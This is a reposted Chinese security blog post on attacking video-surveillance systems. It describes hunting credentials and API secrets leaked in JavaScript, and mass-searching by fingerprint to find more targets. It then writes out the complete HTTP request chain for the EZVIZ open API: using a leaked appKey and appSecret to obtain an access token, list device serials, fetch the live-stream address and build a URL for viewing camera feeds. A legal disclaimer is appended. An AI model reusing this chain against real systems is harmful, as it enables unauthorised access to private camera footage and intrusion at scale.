文章总结： 该文档分享了针对视频监控类资产的攻防实战经验，重点介绍了通过JS泄露账号密码和secret密钥的常见漏洞，并以萤石监控系统为例详细演示了利用appKey和appSecret获取accessToken、deviceSerial，最终拼接URL实现监控视频访问的完整攻击链。文章强调了此类漏洞的随机性特征，并提供了具体的API请求示例和操作步骤。 综合评分： 78 文章分类： 渗透测试,WEB安全,实战经验,漏洞分析,IoT安全

攻防实战 | 视频监控类资产专项攻击1

原创

安全艺术 安全艺术

安全艺术

2026年5月8日 20:19 北京

在小说阅读器读本章

去阅读

1. js泄露账号密码

老生常谈了，碰到了就是纯运气了，如果还没有重复就可以试试买彩票了。

稍微发散下，拿图标等指纹信息批量搜一下，也许会打到一大波，哈哈哈哈。

2. js泄露secret

还是看运气。

萤石的key第一次碰到，查了资料说是可以直接看监控，打了一波，记录下。

获取accessToken

POST /api/lapp/token/get HTTP/1.1
Host: open.ys7.com
Accept: application/json
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 82

appKey=xxx&appSecret=xxx

获取deviceSerial

POST /api/lapp/device/list HTTP/1.1
Host: open.ys7.com
Accept: application/json
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 101

accessToken=xxxxxx&pageStart=1&pageSize=10

获取url

POST /api/lapp/v2/live/address/get HTTP/1.1
Host: open.ys7.com
Accept: application/json
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 99

accessToken=xxxxx&deviceSerial=xxxxx

直接拼接访问

https://open.ys7.com/ezopen/h5/iframe_se?url=xxxx&autoplay=1&accessToken=xxxx

最后推一下我的实战小圈子

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：安全艺术 安全艺术 安全艺术《攻防实战 | 视频监控类资产专项攻击1》